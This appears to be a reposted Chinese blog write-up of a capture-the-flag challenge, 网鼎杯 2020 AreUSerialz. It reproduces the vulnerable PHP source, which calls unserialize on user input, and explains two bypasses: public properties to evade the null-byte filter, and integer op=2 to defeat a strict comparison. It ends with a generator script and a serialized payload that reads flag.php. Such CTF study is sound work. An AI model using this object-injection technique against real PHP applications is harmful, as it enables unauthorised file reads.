首页 > 其他分享 >[网鼎杯 2020 青龙组]AreUSerialz1

[网鼎杯 2020 青龙组]AreUSerialz1

时间:2024-11-07 19:20:33浏览次数:1  
标签:function res filename content 2020 output AreUSerialz1 网鼎杯 op

今天做了一道比较有趣的反序列化题目([网鼎杯 2020 青龙组]AreUSerialz1),寻思着记录一下。先看源代码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

先来分析一下这道题目的代码,首先可以排除construct这个魔术方法,这里并没有进行序列化,

然后有个is_valid($s)判断,这个主要是会使得我们在序列化protected属性的变量时带着的空字符被检测出来。

所以我们可以考虑用public替代protected的方法将它绕过(这里参考大佬的wp得知对于PHP版本7.1+,对属性的类型不敏感)。

然后我们想要打开flag.php,可以考虑走op == "2"这条路径,然后注意到析构函数destruct那里与"2"的比较为强比较,而process是弱比较,所以考虑绕过方法,由于两边都是字符串"2",以"2a"方式绕过是不现实的,所以考虑用

$op=2

这一方式进行绕过,这样成功将$res赋值file_get_contents($this->filename)并output

payload:

<?php
class FileHandler {
    public $op=2;
    public $filename="flag.php";
    public $content;
}
$a=new FileHandler();
echo serialize($a);

// O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

F12查看源代码就能看到flag

标签:function,res,filename,content,2020,output,AreUSerialz1,网鼎杯,op
From: https://www.cnblogs.com/c1432/p/18533815

相关文章

  • SQL实战训练之,力扣:2020. 无流量的帐户数(递归)
    目录        一、力扣原题链接        二、题目描述        三、建表语句        四、题目分析                五、SQL解答        六、最终答案        七、验证        八、知识点一、......
  • [网鼎杯 2020 青龙组]AreUSerialz
    题目链接:[网鼎杯2020青龙组]AreUSerialz。打开后,环境如下所示。<?phpinclude("flag.php");highlight_file(__FILE__);classFileHandler{protected$op;protected$filename;protected$content;function__construct(){$op="1&......
  • [Zer0pts2020]easy strcmp
    [Zer0pts2020]easystrcmpdie查壳找到加密函数如何找到加密函数的找到init函数,跟进funcs_889、跟进使用x交叉引用qword_201090即可找到主加密函数那这个加密函数是如何连上main函数的呢?mainmain函数这里运用了strcmp,但我们却找不到strcmp到底对比了什么但根据我......
  • [MRCTF2020]Ezpop
    先放源码点击查看代码Welcometoindex.php<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//AndCrackIt!classModifier{protected......
  • P6879 [JOI 2020 Final] スタンプラリー 3 [区间DP]
    P6879[JOI2020Final]スタンプラリー3Solution首先这是一道最优值问题,再根据数据范围\(n\le200\),那么正解可能会是\(O(n^3)\)的DP。根据题意,我们发现主角走过的雕像一定是个区间,可以考虑区间DP。想一想我们需要知道什么,然后把它放到DP状态里面。我们需要知道......
  • 2024年第四届“网鼎杯”网络安全大赛 青龙组 MICS-WriteUp
    文章目录一、前言二、MISCMISC01MICS02MISC03MICS04一、前言两年一届的网络安全"奥运会"也是有幸参加!是一个非常有意思的比赛,其余附件及需要的工具已打包完毕~123网盘下载:https://www.123684.com/s/q2J1jv-MuJvd提取码:0905提取码:0905二、MISCMISC01解......
  • [ACTF2020 新生赛]BackupFile
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]BackupFile打开环境后如下。题目中仅有一句"Trytofindoutsourcefile!"的提示,因此直接扫描一下备份文件,发现存在"index.php.bak"文件,该文件代码如下所示。<?phpinclude_once"flag.php";if(isset($_GET['key......
  • [BJDCTF2020]Easy MD5
    题目链接:https://buuoj.cn/challenges#[BJDCTF2020]EasyMD5打开环境后如下所示。响应包如下。HTTP/1.1200OKServer:openrestyDate:Fri,25Oct202415:20:01GMTContent-Type:text/html;charset=UTF-8Connection:keep-aliveVary:Accept-EncodingX-Powered-By:......
  • [MRCTF2020]你传你呢
    题目链接:https://buuoj.cn/challenges#[MRCTF2020]你传你......
  • [ACTF2020 新生赛]Upload
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Upload打开环境后如下所示。指向灯泡,可以发现存在一个上传功能。尝试先上传".php"后缀文件,响应包如下。题目提示"nonono~Badfile!",此处笔者直接修改后缀为".phtml"后,发现可以成功上传,并且网页告知了上传的文件......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99